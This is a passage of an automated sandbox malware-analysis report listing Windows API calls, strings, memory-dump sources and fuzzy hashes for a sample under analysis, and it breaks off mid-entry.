                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F
                                                        • API String ID: 3977979337-4164748364
                                                        • Opcode ID: e061df55b6dd13e46c8a37c6649904a37f3ca6c93f5c68581521da7622238bf9
                                                        • Instruction ID: a45f5d4145944031a30c37c49d3f223b58df436cea30a76fbdeac455d848736f
                                                        • Opcode Fuzzy Hash: e061df55b6dd13e46c8a37c6649904a37f3ca6c93f5c68581521da7622238bf9
                                                        • Instruction Fuzzy Hash: 0142AB78205241AFDB24CF24CC88EAABBE6FF49350F14052DF659972B1C731D981DB92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memset
                                                        • String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
                                                        • API String ID: 1357608183-4066018314
                                                        • Opcode ID: dbd854f1ca048dd61e3dbc68acfca7fc87afca8ea6d12518e4ad5f9afaa004af
                                                        • Instruction ID: 1d35790f12c021db9aa2a718b01287813fff818b1ef163443e0ff581e4a8c1dd
                                                        • Opcode Fuzzy Hash: dbd854f1ca048dd61e3dbc68acfca7fc87afca8ea6d12518e4ad5f9afaa004af
                                                        • Instruction Fuzzy Hash: 1E93A271A04215DBDB28CF98C8817EDB7B1FF48710F25816AE959AB385E7709EC1CB50
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?), ref: 000C48DF
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000FD665
                                                        • IsIconic.USER32(?), ref: 000FD66E
                                                        • ShowWindow.USER32(?,00000009), ref: 000FD67B
                                                        • SetForegroundWindow.USER32(?), ref: 000FD685
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000FD69B
                                                        • GetCurrentThreadId.KERNEL32 ref: 000FD6A2
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 000FD6AE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 000FD6BF
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 000FD6C7
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 000FD6CF
                                                        • SetForegroundWindow.USER32(?), ref: 000FD6D2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000FD6E7
                                                        • keybd_event.USER32(00000012,00000000), ref: 000FD6F2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000FD6FC
                                                        • keybd_event.USER32(00000012,00000000), ref: 000FD701
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000FD70A
                                                        • keybd_event.USER32(00000012,00000000), ref: 000FD70F
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000FD719
                                                        • keybd_event.USER32(00000012,00000000), ref: 000FD71E
                                                        • SetForegroundWindow.USER32(?), ref: 000FD721
                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 000FD748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: 1c98c06400b03f656eb5929ede7ad0a3cfba9d42a7ed9595e8e086c9167f8d64
                                                        • Instruction ID: c03d3d63012727cdf94af7a0f282687820aa7eb0294e71ec3e48add1cea48690
                                                        • Opcode Fuzzy Hash: 1c98c06400b03f656eb5929ede7ad0a3cfba9d42a7ed9595e8e086c9167f8d64
                                                        • Instruction Fuzzy Hash: 1D319775A4031C7AEB206F619C49F7F7E6DEB45B50F104029FA04EA6E1D6705842AAA0
                                                        APIs
                                                          • Part of subcall function 001187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011882B
                                                          • Part of subcall function 001187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00118858
                                                          • Part of subcall function 001187E1: GetLastError.KERNEL32 ref: 00118865
                                                        • _memset.LIBCMT ref: 00118353
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001183A5
                                                        • CloseHandle.KERNEL32(?), ref: 001183B6
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001183CD
                                                        • GetProcessWindowStation.USER32 ref: 001183E6
                                                        • SetProcessWindowStation.USER32(00000000), ref: 001183F0
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0011840A
                                                          • Part of subcall function 001181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00118309), ref: 001181E0
                                                          • Part of subcall function 001181CB: CloseHandle.KERNEL32(?,?,00118309), ref: 001181F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: 97c1dcde9541550226fe0f86a15e58f29c1e7f61cbe2bc49ee087305e950646c
                                                        • Instruction ID: 5c33b4fdc0f3e27d3b330bd2c1793b4a16ed7b227e6c4969414bc59376f1bb07
                                                        • Opcode Fuzzy Hash: 97c1dcde9541550226fe0f86a15e58f29c1e7f61cbe2bc49ee087305e950646c
                                                        • Instruction Fuzzy Hash: 77819B71900249BFDF15DFA4CC49AEE7BBAFF05304F148169F914A62A1EB318E95DB20
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0012C78D
                                                        • FindClose.KERNEL32(00000000), ref: 0012C7E1
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0012C806
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0012C81D
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012C844
                                                        • __swprintf.LIBCMT ref: 0012C890
                                                        • __swprintf.LIBCMT ref: 0012C8D3
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • __swprintf.LIBCMT ref: 0012C927
                                                          • Part of subcall function 000E3698: __woutput_l.LIBCMT ref: 000E36F1
                                                        • __swprintf.LIBCMT ref: 0012C975
                                                          • Part of subcall function 000E3698: __flsbuf.LIBCMT ref: 000E3713
                                                          • Part of subcall function 000E3698: __flsbuf.LIBCMT ref: 000E372B
                                                        • __swprintf.LIBCMT ref: 0012C9C4
                                                        • __swprintf.LIBCMT ref: 0012CA13
                                                        • __swprintf.LIBCMT ref: 0012CA62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: a2b57908084623ac2e6c66dc12987bbee021d07535760ec9d1eb86e07a652a10
                                                        • Instruction ID: 78ef74e23185186b48e55cde97de7d5a641753c80ecfa7c193258cf9a20eef04
                                                        • Opcode Fuzzy Hash: a2b57908084623ac2e6c66dc12987bbee021d07535760ec9d1eb86e07a652a10
                                                        • Instruction Fuzzy Hash: B2A10CB1404344ABC714EBA4D889EAFB7ECEF95704F40491DF59587192EB30DA48CB62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0012EFB6
                                                        • _wcscmp.LIBCMT ref: 0012EFCB
                                                        • _wcscmp.LIBCMT ref: 0012EFE2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0012EFF4
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0012F00E
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0012F026
                                                        • FindClose.KERNEL32(00000000), ref: 0012F031
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0012F04D
                                                        • _wcscmp.LIBCMT ref: 0012F074
                                                        • _wcscmp.LIBCMT ref: 0012F08B
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012F09D
                                                        • SetCurrentDirectoryW.KERNEL32(00178920), ref: 0012F0BB
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012F0C5
                                                        • FindClose.KERNEL32(00000000), ref: 0012F0D2
                                                        • FindClose.KERNEL32(00000000), ref: 0012F0E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: f9884a471d4f73a15572150426133a3f6bef2b2701188e75d5162b4f9e29b34b
                                                        • Instruction ID: 737a073e6032ac9260cf8a9da054b5a9b23bc4ddbc11317f9b4bc55ec8541786
                                                        • Opcode Fuzzy Hash: f9884a471d4f73a15572150426133a3f6bef2b2701188e75d5162b4f9e29b34b
                                                        • Instruction Fuzzy Hash: 6D31E3365002286FDB149FA4EC48EEE77BDEF49360F104179F904E31A1EB70DA92CA65
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00140953
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0014F910,00000000,?,00000000,?,?), ref: 001409C1
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00140A09
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00140A92
                                                        • RegCloseKey.ADVAPI32(?), ref: 00140DB2
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00140DBF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: 75a172e78a5eca3b7a53f4cffc66c4078873267e5d64db0a64b313843346b208
                                                        • Instruction ID: 21fcaaf412750434ffe7ea9a67e07c2d12b7dcce3e19362c7674846e5c38b2e5
                                                        • Opcode Fuzzy Hash: 75a172e78a5eca3b7a53f4cffc66c4078873267e5d64db0a64b313843346b208
                                                        • Instruction Fuzzy Hash: 6A0259756006119FCB15EF25C885E6AB7E5FF89714F04885DF98A9B3A2CB30EC45CB81
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0012F113
                                                        • _wcscmp.LIBCMT ref: 0012F128
                                                        • _wcscmp.LIBCMT ref: 0012F13F
                                                          • Part of subcall function 00124385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001243A0
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0012F16E
                                                        • FindClose.KERNEL32(00000000), ref: 0012F179
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0012F195
                                                        • _wcscmp.LIBCMT ref: 0012F1BC
                                                        • _wcscmp.LIBCMT ref: 0012F1D3
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012F1E5
                                                        • SetCurrentDirectoryW.KERNEL32(00178920), ref: 0012F203
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012F20D
                                                        • FindClose.KERNEL32(00000000), ref: 0012F21A
                                                        • FindClose.KERNEL32(00000000), ref: 0012F22C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: d8a47f378c8bdc207ea7fb1ac36795a407bba72190f55f6aec212a3b3afeb3ef
                                                        • Instruction ID: f5b02347b8adc8e9809a398e8b41c1ad17054c6d0fe2491ab32efc922e344863
                                                        • Opcode Fuzzy Hash: d8a47f378c8bdc207ea7fb1ac36795a407bba72190f55f6aec212a3b3afeb3ef
                                                        • Instruction Fuzzy Hash: 6831E73A500629AEDB149F64FC49EEE77BC9F46360F100179E914E32A1DB30DEA6CE54
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0012A20F
                                                        • __swprintf.LIBCMT ref: 0012A231
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0012A26E
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0012A293
                                                        • _memset.LIBCMT ref: 0012A2B2
                                                        • _wcsncpy.LIBCMT ref: 0012A2EE
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0012A323
                                                        • CloseHandle.KERNEL32(00000000), ref: 0012A32E
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0012A337
                                                        • CloseHandle.KERNEL32(00000000), ref: 0012A341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: 891e64457d7313c225e934219d9d2576e5b45cd1eb664a6c1630c6a3a36165e2
                                                        • Instruction ID: 17d05c7fd6ea38910e076816815e5c48b26c79e0d3f7d1a551b9793c2c239ccb
                                                        • Opcode Fuzzy Hash: 891e64457d7313c225e934219d9d2576e5b45cd1eb664a6c1630c6a3a36165e2
                                                        • Instruction Fuzzy Hash: 5C31E675904119ABDB20DFA0DC49FEB37BCFF89700F5040BAF508D2161E77096958B65
                                                        APIs
                                                          • Part of subcall function 00118202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0011821E
                                                          • Part of subcall function 00118202: GetLastError.KERNEL32(?,00117CE2,?,?,?), ref: 00118228
                                                          • Part of subcall function 00118202: GetProcessHeap.KERNEL32(00000008,?,?,00117CE2,?,?,?), ref: 00118237
                                                          • Part of subcall function 00118202: HeapAlloc.KERNEL32(00000000,?,00117CE2,?,?,?), ref: 0011823E
                                                          • Part of subcall function 00118202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00118255
                                                          • Part of subcall function 0011829F: GetProcessHeap.KERNEL32(00000008,00117CF8,00000000,00000000,?,00117CF8,?), ref: 001182AB
                                                          • Part of subcall function 0011829F: HeapAlloc.KERNEL32(00000000,?,00117CF8,?), ref: 001182B2
                                                          • Part of subcall function 0011829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00117CF8,?), ref: 001182C3
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00117D13
                                                        • _memset.LIBCMT ref: 00117D28
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00117D47
                                                        • GetLengthSid.ADVAPI32(?), ref: 00117D58
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00117D95
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00117DB1
                                                        • GetLengthSid.ADVAPI32(?), ref: 00117DCE
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00117DDD
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00117DE4
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00117E05
                                                        • CopySid.ADVAPI32(00000000), ref: 00117E0C
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00117E3D
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00117E63
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00117E77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 18338173d9fdd7cdc922155190a0735a84b22871e3597e335d8e6d50d92eb4c0
                                                        • Instruction ID: 573cb61696e722c3f550025e29db315d1beb3cb31f870e0ab2e9a617fa30679c
                                                        • Opcode Fuzzy Hash: 18338173d9fdd7cdc922155190a0735a84b22871e3597e335d8e6d50d92eb4c0
                                                        • Instruction Fuzzy Hash: 45616C75904209AFDF04CFA0DC44AEEBBBAFF45300F148169F815A72A1DB319A86CB60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
                                                        • API String ID: 0-1710143159
                                                        • Opcode ID: d0903400e819e0e3471361d899b7c93dca07bda20fc3e7039be13afd7ee319ef
                                                        • Instruction ID: bf5fa84858035239275b00af70d2ea150b5a0439d2430f0d9775cc15810df643
                                                        • Opcode Fuzzy Hash: d0903400e819e0e3471361d899b7c93dca07bda20fc3e7039be13afd7ee319ef
                                                        • Instruction Fuzzy Hash: E1726E75E003199BDB28CF58C8407EEB7B5FF48710F14816AE949EB391EB719981CBA0
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00120097
                                                        • SetKeyboardState.USER32(?), ref: 00120102
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00120122
                                                        • GetKeyState.USER32(000000A0), ref: 00120139
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00120168
                                                        • GetKeyState.USER32(000000A1), ref: 00120179
                                                        • GetAsyncKeyState.USER32(00000011), ref: 001201A5
                                                        • GetKeyState.USER32(00000011), ref: 001201B3
                                                        • GetAsyncKeyState.USER32(00000012), ref: 001201DC
                                                        • GetKeyState.USER32(00000012), ref: 001201EA
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00120213
                                                        • GetKeyState.USER32(0000005B), ref: 00120221
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: e8fe669c40f60f61e5554bf30b70e5dfcfdde88eb6e33d9aeabb77af3b14cf07
                                                        • Instruction ID: b8d0599f13ca74b93185595a00ec34c720ad3029b0edf246d2e2410104132b76
                                                        • Opcode Fuzzy Hash: e8fe669c40f60f61e5554bf30b70e5dfcfdde88eb6e33d9aeabb77af3b14cf07
                                                        • Instruction Fuzzy Hash: 1A512C309043A829FB36DBA0A8547EABFB49F15380F08479ED9C15A5C3DB64DB9CC761
                                                        APIs
                                                          • Part of subcall function 00140E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001404AC
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0014054B
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001405E3
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00140822
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0014082F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 39c074b8d75c45bbfd693ef8985e1e7f82ef4008724b9e9e32688c8dfe3a7d49
                                                        • Instruction ID: 18d18e6ff316a0ae2a9d85b33047731451e1e97e26fef68a8441e908660f7f5b
                                                        • Opcode Fuzzy Hash: 39c074b8d75c45bbfd693ef8985e1e7f82ef4008724b9e9e32688c8dfe3a7d49
                                                        • Instruction Fuzzy Hash: 12E17D31604200AFCB15DF29C885E6ABBE5FF89714F04856DF94ADB262DB30EC41CB92
                                                        APIs
                                                        Memory Dump Source
